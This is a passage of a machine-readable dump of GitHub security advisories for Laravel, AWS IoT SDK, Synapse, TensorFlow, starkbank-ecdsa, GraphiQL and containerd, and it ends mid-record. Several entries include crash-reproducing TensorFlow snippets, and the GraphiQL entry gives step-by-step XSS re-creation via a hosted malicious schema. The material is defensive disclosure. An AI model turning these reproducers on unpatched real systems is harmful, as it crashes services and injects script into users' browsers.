+1.4.0,GHSA-364w-9g92-3grq,2021-11-17T22:04:33Z,2021-11-16T23:40:08Z,2021-11-17T15:41:54Z,['CVE-2021-43617'],Withdrawn: Laravel Framework does not sufficiently block the upload of executable PHP content.,"# Withdrawn + +This advisory has been withdrawn after the maintainers of Laravel noted this issue is not a security vulnerability with Laravel itself, but rather a userland issue. + +## Original CVE based description + +Laravel Framework through 8.70.2 does not sufficiently block the upload of executable PHP content because Illuminate/Validation/Concerns/ValidatesAttributes.php lacks a check for .phar files, which are handled as application/x-httpd-php on systems based on Debian. In some use cases, this may be related to file-type validation for image upload (e.g., differences between getClientOriginalExtension and other approaches).",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '8.70.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43617'}, {'type': 'PACKAGE', 'url': 'https://github.com/laravel/framework'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/blob/2049de73aa099a113a287587df4cc522c90961f5/src/Illuminate/Validation/Concerns/ValidatesAttributes.php#L1130-L1132'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/blob/2049de73aa099a113a287587df4cc522c90961f5/src/Illuminate/Validation/Concerns/ValidatesAttributes.php#L1331-L1333'}, {'type': 'WEB', 'url': 'https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b'}, {'type': 'WEB', 'url': 'https://salsa.debian.org/php-team/php/-/blob/dc253886b5b2e9bc8d9e36db787abb083a667fd8/debian/php-cgi.conf#L5-6'}, {'type': 'WEB', 'url': 'https://salsa.debian.org/php-team/php/-/commit/dc253886b5b2e9bc8d9e36db787abb083a667fd8'}]","{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:20:46Z', 'nvd_published_at': '2021-11-14T16:15:00Z'}" +1.4.0,GHSA-c4rh-4376-gff4,2021-12-03T15:22:02Z,2021-11-24T21:12:04Z,,['CVE-2021-40830'],Improper certificate management in AWS IoT Device SDK v2,"The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'aws-iot-device-sdk-v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'awsiotsdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40830'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-cpp-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/aws-c-io/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:28:03Z', 'nvd_published_at': '2021-11-23T00:15:00Z'}" +1.4.0,GHSA-3hfw-x7gx-437c,2021-11-23T21:45:31Z,2021-11-23T21:58:56Z,,['CVE-2021-41281'],Path traversal in Matrix Synapse,"### Impact + +Synapse instances with the media repository enabled can be tricked into downloading a file from a remote server into an arbitrary directory, potentially outside the media store directory. + +The last two directories and file name of the path are chosen randomly by Synapse and cannot be controlled by an attacker, which limits the impact. + +Homeservers with the media repository disabled are unaffected. Homeservers configured with a federation whitelist are also unaffected. + +### Patches +Server administrators should upgrade to 1.47.1 or later. + +### Workarounds +Server administrators using a reverse proxy could, at the expense of losing media functionality, block the following endpoints: + +* `/_matrix/media/r0/download/{serverName}/{mediaId}` +* `/_matrix/media/r0/download/{serverName}/{mediaId}/{fileName}` +* `/_matrix/media/r0/thumbnail/{serverName}/{mediaId}` + +Alternatively, non-containerized deployments can be adapted to use the hardened systemd config, located at `contrib/systemd/override-hardened.conf`. + +### References +n/a + +### For more information + +If you have any questions or comments about this advisory, e-mail us at security@matrix.org. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.47.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-3hfw-x7gx-437c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41281'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/91f2bd090'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.47.1'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EU7QRE55U4IUEDLKT5IYPWL3UXMELFAS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N3WY56LCEZ4ZECLWV5KMAXF2PSMUB4F2/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-23T18:44:39Z', 'nvd_published_at': '2021-11-23T20:15:00Z'}" +1.4.0,GHSA-vwhq-49r4-gj9v,2021-11-08T22:24:08Z,2021-11-10T18:58:16Z,,['CVE-2021-41214'],Reference binding to `nullptr` in `tf.ragged.cross`,"### Impact +The [shape inference code for `tf.ragged.cross`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/ragged_array_ops.cc#L64) has an undefined behavior due to binding a reference to `nullptr`. In the following scenario, this results in a crash: + +```python +import tensorflow as tf + +@tf.function +def test(): + y = tf.ragged.cross([tf.ragged.constant([['1']]),'2']) + return y + +test() +``` + +### Patches +We have patched the issue in GitHub commit [fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8](https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vwhq-49r4-gj9v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41214'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:24:08Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-r28h-x6hv-2fq3,2021-11-15T14:43:04Z,2021-11-10T20:48:00Z,,['CVE-2021-43570'],Improper Verification of Cryptographic Signature in starkbank-ecdsa,"The verify function in the Stark Bank Java ECDSA library (ecdsa-java) 1.0.0 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.starkbank:starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43570'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-java/pull/16'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-java/commit/ed22e484186d6c66d3686bfe39d01bdbabf219b6'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-java'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-java/releases/tag/v1.0.1'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:25:02Z', 'nvd_published_at': '2021-11-09T22:15:00Z'}" +1.4.0,GHSA-x4r7-m2q9-69c8,2021-11-04T19:36:52Z,2021-11-08T18:03:50Z,,['CVE-2021-41248'],GraphiQL introspection schema template injection attack," - [1. Impact](#11-impact) + - [2. Scope](#12-scope) + - [3. Patches](#13-patches) + - [3.1 CDN bundle implementations may be automatically patched](#131-cdn-bundle-implementations-may-be-automatically-patched) + - [4. Workarounds for Older Versions](#14-workarounds-for-older-versions) + - [5. How to Re-create the Exploit](#15-how-to-re-create-the-exploit) + - [6. Credit](#16-credit) + - [7. References](#17-references) + - [8. For more information](#18-for-more-information) + +This is a security advisory for an XSS vulnerability in `graphiql`. + +A similar vulnerability affects `graphql-playground`, a fork of `graphiql`. There is a corresponding `graphql-playground` [advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7) and [Apollo Server advisory](https://github.com/apollographql/apollo-server/security/advisories/GHSA-qm7x-rc44-rrqw). + +## 1. Impact + +All versions of `graphiql` older than [`graphiql@1.4.7`](https://github.com/graphql/graphiql/releases/tag/v1.4.7) are vulnerable to compromised HTTP schema introspection responses or `schema` prop values with malicious GraphQL type names, exposing a dynamic XSS attack surface that can allow code injection on operation autocomplete. + +In order for the attack to take place, the user must load a vulnerable schema in `graphiql`. There are a number of ways that can occur. + +By default, the schema URL is _not_ attacker-controllable in `graphiql` or in its suggested implementations or examples, leaving only very complex attack vectors. + +If a custom implementation of `graphiql`'s `fetcher` allows the schema URL to be set dynamically, such as a URL query parameter like `?endpoint=` in `graphql-playground`, or a database provided value, then this custom `graphiql` implementation is _vulnerable to phishing attacks_, and thus much more readily available, low or no privelege level xss attacks. The URLs could look like any generic looking graphql schema URL. + +Because this exposes an XSS attack surface, it would be possible for a threat actor to exfiltrate user credentials, data, etc. using arbitrary malicious scripts, without it being known to the user. + +## 2. Scope + +This advisory describes the impact on the `graphiql` package. The vulnerability also affects other projects forked from `graphiql` such as [`graphql-playground`](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7) and the `graphql-playground` fork distributed by Apollo Server. The impact is more severe in the `graphql-playground` implementations; see the [`graphql-playground` advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7) and [Apollo Server advisory](https://github.com/apollographql/apollo-server/security/advisories/GHSA-qm7x-rc44-rrqw) for details. + +This vulnerability does not impact `codemirror-graphql`, `monaco-graphql` or other dependents, as it exists in `onHasCompletion.ts` in `graphiql`. It does impact all forks of `graphiql`, and every released version of `graphiql`. + +It should be noted that desktop clients such as Altair, Insomnia, Postwoman, do not appear to be impacted by this. + +## 3. Patches + +`graphiql@1.4.7` addresses this issue via defense in depth. + +- **HTML-escaping text** that should be treated as text rather than HTML. In most of the app, this happens automatically because React escapes all interpolated text by default. However, one vulnerable component uses the unsafe `innerHTML` API and interpolated type names directly into HTML. We now properly escape that type name, which fixes the known vulnerability. + +- **Validates the schema** upon receiving the introspection response or schema changes. Schemas with names that violate the GraphQL spec will no longer be loaded. (This includes preventing the Doc Explorer from loading.) This change is also sufficient to fix the known vulnerability. You can disable this validation by setting `dangerouslyAssumeSchemaIsValid={true}`, which means you are relying only on escaping values to protect you from this attack. + +- **Ensuring that user-generated HTML is safe**. Schemas can contain Markdown in `description` and `deprecationReason` fields, and the web app renders them to HTML using the `markdown-it` library. As part of the development of `graphiql@1.4.7`, we verified that our use of `markdown-it` prevents the inclusion of arbitrary HTML. We use `markdown-it` without setting `html: true`, so we are comfortable relying on [`markdown-it`'s HTML escaping](https://github.com/markdown-it/markdown-it/blob/master/docs/security.md) here. We considered running a second level of sanitization over all rendered Markdown using a library such as `dompurify` but believe that is unnecessary as `markdown-it`'s sanitization appears to be adequate. `graphiql@1.4.7` does update to the latest version of `markdown-it` (v12, from v10) so that any security fixes in v11 and v12 will take effect. + +### 3.1 CDN bundle implementations may be automatically patched + +Note that if your implementation is depending on a CDN version of `graphiql`, and is pointed to the `latest` tag (usually the default for most cdns if no version is specified) then this issue is already mitigated, in case you were vulnerable to it before. + +## 4. Workarounds for Older Versions + +If you cannot use `graphiql@1.4.7` or later + +- Always use a static URL to a trusted server that is serving a trusted GraphQL schema. + +- If you have a custom implementation that allows using user-provided schema URLs via a query parameter, database value, etc, you must either disable this customization, or only allow trusted URLs. + +## 5. How to Re-create the Exploit + +You can see an example on [codesandbox](https://codesandbox.io/s/graphiql-xss-exploit-gr22f?file=/src/App.js). These are both fixed to the last `graphiql` release `1.4.6` which is the last vulnerable release; however it would work with any previous release of `graphiql`. + +Both of these examples are meant to demonstrate the phishing attack surface, so they are customized to accept a `url` parameter. To demonstrate the phishing attack, add `?url=https://graphql-xss-schema.netlify.app/graphql` to the in-codesandbox browser. + +Erase the contents of the given query and type `{u`. You will see an alert window open, showing that attacker-controlled code was executed. + +Note that when React is in development mode, a validation exception is thrown visibly; however that exception is usually buried in the browser console in a production build of `graphiql`. This validation exception comes from `getDiagnostics`, which invokes `graphql` `validate()` which in turn will `assertValidSchema()`, as `apollo-server-core` does on executing each operation. This validation does not prevent the exploit from being successful. + +Note that something like the `url` parameter is not required for the attack to happen if `graphiql`'s `fetcher` is configured in a different way to communicate with a compromised GraphQL server. + +## 6. Credit + +This vulnerability was discovered by [@Ry0taK](https://github.com/Ry0taK), thank you! :1st_place_medal: + +Others who contributed: + +- [@imolorhe](https://github.com/imolorhe) +- [@glasser](https://github.com/glasser) +- [@divyenduz](https://github.com/divyenduz) +- [@dotansimha](https://github.com/dotansimha) +- [@acao](https://github.com/acao) +- [@benjie](https://github.com/benjie) and many others who provided morale support + +## 7. References + +**The vulnerability has always been present** + +[In the first commit](https://github.com/graphql/graphiql/commit/b9dec272d89d9c590727fd10d62e4a47e0317fc7#diff-855b77f6310b7e4fb1bcac779cd945092ed49fd759f4684ea391b45101166437R87) + +[And later moved to onHasCompletion.js in 2016](https://github.com/graphql/graphiql/commit/6701b0b626e43800e32413590a295e5c1e3d5419#diff-d45eb76aebcffd27d3a123214487116fa95e0b5a11d70a94a0ce3033ce09f879R110) (now `.ts` after the typescript migration) + +## 8. For more information + +If you have any questions or comments about this advisory: + +- Open an issue in [graphiql repo](https://github.com/graphql/graphiql/new/issues) +- Read [more details](https://github.com/graphql/graphiql/blob/main/docs/security/2021-introspection-schema-xss.md#2-more-details-on-the-vulnerability) on the vulnerability","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'graphiql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.0'}, {'fixed': '1.4.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41248'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/commit/6701b0b626e43800e32413590a295e5c1e3d5419#diff-d45eb76aebcffd27d3a123214487116fa95e0b5a11d70a94a0ce3033ce09f879R110'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/commit/b9dec272d89d9c590727fd10d62e4a47e0317fc7#diff-855b77f6310b7e4fb1bcac779cd945092ed49fd759f4684ea391b45101166437R87'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/commit/cb237eeeaf7333c4954c752122261db7520f7bf4'}, {'type': 'PACKAGE', 'url': 'https://github.com/graphql/graphiql'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/blob/main/docs/security/2021-introspection-schema-xss.md#2-more-details-on-the-vulnerability'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T18:11:46Z', 'nvd_published_at': '2021-11-04T21:15:00Z'}" +1.4.0,GHSA-5hx2-qx8j-qjqm,2021-11-08T22:51:41Z,2021-11-10T19:33:24Z,,['CVE-2021-41199'],Overflow/crash in `tf.image.resize` when size is large,"### Impact +If `tf.image.resize` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow. + +```python +import tensorflow as tf +import numpy as np + +tf.keras.layers.UpSampling2D( + size=1610637938, + data_format='channels_first', + interpolation='bilinear')(np.ones((5,1,1,1))) +``` + +The number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process. + +### Patches +We have patched the issue in GitHub commit [e5272d4204ff5b46136a1ef1204fc00597e21837](https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837) (merging [#51497](https://github.com/tensorflow/tensorflow/pull/51497)). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46914).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5hx2-qx8j-qjqm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41199'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46914'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:51:41Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}" +1.4.0,GHSA-5j5w-g665-5m35,2023-03-30T14:50:04Z,2021-11-18T16:08:58Z,,[],Ambiguous OCI manifest parsing,"### Impact + +In the OCI Distribution Specification version 1.0.0 and prior and in the OCI Image Specification version 1.0.1 and prior, manifest and index documents are ambiguous without an accompanying Content-Type HTTP header. Versions of containerd prior to 1.4.12 and 1.5.8 treat the Content-Type header as trusted and deserialize the document according to that header. If the Content-Type header changed between pulls of the same ambiguous document (with the same digest), the document may be interpreted differently, meaning that the digest alone is insufficient to unambiguously identify the content of the image. + +### Patches + +This issue has been fixed in containerd 1.4.12 and 1.5.8. Image pulls for manifests that contain a “manifests” field or indices which contain a “layers” field are rejected. + +### Workarounds + +Ensure you only pull images from trusted sources. + +### References + +https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m +https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose) +* Email us at [security@containerd.io](mailto:security@containerd.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-5j5w-g665-5m35'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/26c76a3014e71af5ad2f396ec76e0e0ecc8e25a3'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/db00065a969a983ceb0a409833f93f705f284ea4'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.4.12'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.8'}]","{'cwe_ids': ['CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-18T14:43:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-5crj-c72x-m7gq,2021-11-08T22:12:27Z,2021-11-10T18:55:11Z,,['CVE-2021-41217'],Null pointer exception when `Exit` node is not preceded by `Enter` op,"### Impact +The [process of building the control flow graph](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/common_runtime/immutable_executor_state.cc#L284-L346) for a TensorFlow model is vulnerable to a null pointer exception when nodes that should be paired are not: + +```python +import tensorflow as tf + +@tf.function +def func(): + return tf.raw_ops.Exit(data=[False,False]) + +func() +``` + +This occurs because the code assumes that the first node in the pairing (e.g., an `Enter` node) always exists when encountering the second node (e.g., an `Exit` node): + +```cc + ... +} else if (IsExit(curr_node)) { + // Exit to the parent frame. + parent = parent_nodes[curr_id]; + frame_name = cf_info->frame_names[parent->id()]; + ... +``` + +When this is not the case, `parent` is `nullptr` so dereferencing it causes a crash. + +### Patches +We have patched the issue in GitHub commit [05cbebd3c6bb8f517a158b0155debb8df79017ff](https://github.com/tensorflow/tensorflow/commit/05cbebd3c6bb8f517a158b0155debb8df79017ff). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 